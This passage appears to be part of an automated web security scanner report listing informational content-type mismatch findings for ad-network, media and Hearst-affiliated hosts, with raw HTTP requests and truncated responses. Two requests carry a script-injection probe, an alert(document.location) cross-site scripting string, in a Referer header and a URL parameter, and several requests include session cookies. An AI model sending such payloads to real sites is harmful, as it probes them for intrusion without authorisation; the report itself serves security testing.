User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:58 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Content-Type: text/html
Content-Length: 12137

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
26.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:56 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: LP=1316277476; expires=Wed, 21 Sep 2011 20:37:56 GMT; path=/; domain=.questionmarket.com
Content-Length: 2417
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
26.8. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=926534&site=67859363&code=43407795&randnum=2910935 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; LP=1316276716; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_926534-vu@|M-0_927907-{w@|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:52 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b103.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1815
Content-Type: text/html

(function() {
var rp=parseFloat("100"),r=Math.random()*10000,s_id="DL_926534_6_43407795",w=window,d=document;

var swid = "";
if ('' != "") {
   var tags = document.getElementsByTagN
...[SNIP]...
26.9. http://api.uproxx.com/ulink/feed  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.uproxx.com
Path:   /ulink/feed

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:14:44 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4543

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10982","source_title":"Uproxx"
...[SNIP]...
26.10. http://api.uproxx.com/ulink/template.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.uproxx.com
Path:   /ulink/template.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ulink/template.js HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:09:33 GMT
Server: Apache
Pragma: public
Cache-Control: maxage=1209600
Expires: Sat, 01 Oct 2011 16:09:33 GMT
Vary: Accept-Encoding
Content-Length: 2009
Content-Type: text/plain; charset=UTF-8

function ulink_format_number(nStr) {
   nStr += '';
   x = nStr.split('.');
   x1 = x[0];
   x2 = x.length > 1 ? '.' + x[1] : '';
   var rgx = /(\d+)(\d{3})/;
   while (rgx.test(x1)) {
       x1 = x1.replace(rgx, '$1'
...[SNIP]...
26.11. http://api.zap2it.com/tvlistings/zcConnector.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.zap2it.com
Path:   /tvlistings/zcConnector.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518 HTTP/1.1
Host: api.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
ntCoent-Length: 455
Content-Length: 455
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:30 GMT
Date: Sat, 17 Sep 2011 16:23:30 GMT
Connection: close


var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101&stnlt=10387,10520,10518";
var action;


action = "/tvlistings/ZCPrimeTimeGrid.do?
...[SNIP]...
26.12. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=DLSRS2&AP=1089 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; TOptOut=1; MC1=V=3&GUID=5ac4e212f4dc41e28ae541c631a9a2ed; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=53847eaa577b4a27af787123681cd00c&bd=2011-09-15T16:18:14.634&v=2; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318873684837%26vn%3D1; MSNTVID=5ac4e212f4dc41e28ae541c631a9a2ed; VWCUKP300=L123100/Q80830_15132_2078_091711_1_093011_489193x482893x091711x1x1; s_nr=1316282718696; mbox=session#1316281807974-204714#1316285017|PC#1316281807974-204714.19#1317492757|check#true#1316283217; Sample=3; zip=c:us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2268
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P6910382-T8209451-C1467943
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:29:18 GMT
Content-Length: 2268


//<![CDATA[
function getRADIds(){return{"adid":"1467943","pid":"6910382","targetid":"8209451"};}if(typeof(inDapIF) != "undefined" && parent._dapUtils.is_ie5up && (parent._dapUtils.majorVer < 9)){pa
...[SNIP]...
26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2501484&PluID=0&w=300&h=250&ord=%time%&ucm=true&ncu=$$http://clk.specificclick.net/click/v=5;m=2;l=24537;c=176617;b=1043680;ts=1316276625;dct=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Content-Length: 1698

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
26.14. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /535BB4CE-7CD8-11E0-8B1F-79D9E4064C68

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /535BB4CE-7CD8-11E0-8B1F-79D9E4064C68 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316296570568&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:55:01 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13385

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackBlue-535BB4CE-7CD8-11E0-8B1F-79D9E4064C68 { width: 300px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...
26.15. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/hearst-logo.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/images/hearst-logo.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /wp-content/themes/thesis/custom/images/hearst-logo.png HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 05:21:50 GMT
ETag: "2ec8a-83a-4a8654afb7780"
Accept-Ranges: bytes
Content-Length: 2106
Content-Type: image/png
Date: Sat, 17 Sep 2011 16:24:54 GMT
Connection: close

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......&...."..............................
...[SNIP]...
26.16. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.misquincemag.com%2F&uid=goT0SKb9csQQCWy8_378374&xy=0%2C0&wh=728%2C90&vchannel=90120&cid=196462&iad=1316294811596-40833402285352350&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=54308467B58171B4041647F4995A4024; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Sat, 17 Sep 2011 16:39:35 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("goT0SKb9csQQCWy8_378374");
26.17. http://events.seattlepi.com/partner_json/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://events.seattlepi.com
Path:   /partner_json/search

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&ssrss=0&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&cat=8%2C10&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294685820-New%7C1318886685820%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.1.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:26:42 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: fresh
X-HTTP_CLIENT_IP_O: 130.76.32.208
ETag: "0792d214ed8b0db54d7172d3787531b5"
X-Runtime: 151
Access-Control-Allow-Origin: *
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: bba442552c59774518fb1027ae67382910095d96
Cache-Control: max-age=1800, public
Z-REQUEST-HANDLED-BY: www28
Age: 1660
Content-Length: 2340

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Michael Jackson THE IMMORTAL World Tour by Cirque du Soleil","venue_id":9279,"id":151948185,"images":[{"url":"http://www.zvents.com/
...[SNIP]...
26.18. http://events.stamfordadvocate.com/partner_json/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://events.stamfordadvocate.com
Path:   /partner_json/search

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /partner_json/search?spn_limit=3&advq=true&sponsored=true&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&rand_spn=15&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.stamfordadvocate.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1316294655808; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=81258325.768035182.1316294656.1316294656.1316294656.1; __utmb=81258325.1.10.1316294656; __utmc=81258325; __utmz=81258325.1316294656.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/the-advocate.php

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:23:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: fresh
X-HTTP_CLIENT_IP_O: 69.120.63.250
ETag: "24f382962f10aa43bb104e3088b412b8"
X-Runtime: 147
Access-Control-Allow-Origin: *
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 295c8528924492c386e55170bb9722a0f851ce46
Cache-Control: max-age=1800, public
Z-REQUEST-HANDLED-BY: www9
Age: 219
Content-Length: 4251

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stamford Hospital Dream Ball","venue_id":1155227,"id":179273805,"images":[],"starttime":"Sat Nov 05 18:00:00 UTC 2011","zurl":"/stam
...[SNIP]...
26.19. http://flesler-plugins.googlecode.com/files/jquery.localscroll-1.2.7-min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://flesler-plugins.googlecode.com
Path:   /files/jquery.localscroll-1.2.7-min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /files/jquery.localscroll-1.2.7-min.js HTTP/1.1
Host: flesler-plugins.googlecode.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.local.com/mk/get/advertising-opportunities

Response

HTTP/1.1 200 OK
Content-Length: 1560
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="jquery.localscroll-1.2.7-min.js"
Accept-Ranges: bytes
Date: Wed, 14 Sep 2011 13:37:32 GMT
Last-Modified: Wed, 11 Mar 2009 23:10:57 GMT
Expires: Wed, 21 Sep 2011 13:37:32 GMT
Server: DFE/largefile
Cache-Control: public, max-age=604800
Age: 270001

/**
* jQuery.LocalScroll - Animated scrolling navigation, using anchors.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under M
...[SNIP]...
26.20. http://goku.brightcove.com/1pix.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goku.brightcove.com
Path:   /1pix.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /1pix.gif?dcsdat=1316294818695&playerURL=http%3A//www.seventeen.com/&flashVer=WIN%2010%2C3%2C183%2C7&lang=en&dcssip=&dcsref=http%3A//hearst.com/newspapers/metrix4media.php&os=Windows%20Server%202008%20R2&publisherId=4139489001&affiliateId=&mem=92536&sourceId=4139489001&dcsuri=/viewer/player_load&time=14028&playerId=77771338001&playerTag= HTTP/1.1
Host: goku.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=280&height=215&flashID=myExperience&bgcolor=%23FFFFFF&playerID=77771338001&publisherID=4139489001&isVid=true&isUI=true&wmode=transparent&dynamicStreaming=true&autoStart=&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:40:39 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 49
Content-Type: text/plain

GIF89a...................!.......,...........T..;
26.21. http://hearst.com/flash/slideshow-home.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hearst.com
Path:   /flash/slideshow-home.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain plain text.

Request

GET /flash/slideshow-home.xml HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/flash/slideshow-home.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:22:36 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Fri, 16 Sep 2011 15:57:57 GMT
ETag: "130b7-af3-e8ccb40"
Accept-Ranges: bytes
Content-Length: 2803
Content-Type: text/xml

<!--<slideshow>    <settings>        <image_folder/>        <time/>        <fade/>        <repeat/>        <captions/>    </settings>    <images>        <image>            <file/>            <caption>                <![CDATA[ ]]>            </caption>        </image>    </ima
...[SNIP]...
26.22. http://hearst.com/flash/slideshow-newspapers.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hearst.com
Path:   /flash/slideshow-newspapers.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain plain text.

Request

GET /flash/slideshow-newspapers.xml HTTP/1.1
Host: hearst.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/flash/slideshow-newspapers.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:40 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Fri, 16 Sep 2011 15:57:57 GMT
ETag: "130bd-545-e8ccb40"
Accept-Ranges: bytes
Content-Length: 1349
Content-Type: text/xml

<!--<slideshow>    <settings>        <image_folder/>        <time/>        <fade/>        <repeat/>        <captions/>    </settings>    <images>        <image>            <file/>            <caption>                <![CDATA[ ]]>            </caption>        </image>    </ima
...[SNIP]...
26.23. http://hfm.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:52 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: cm8dccp=1316277291;Path=/;Expires=Sun, 18-Sep-2011 16:34:51 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 574
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://hfm.checkm8.com/adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http
...[SNIP]...
26.24. http://html5form.googlecode.com/svn/trunk/jquery.html5form-min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://html5form.googlecode.com
Path:   /svn/trunk/jquery.html5form-min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /svn/trunk/jquery.html5form-min.js HTTP/1.1
Host: html5form.googlecode.com
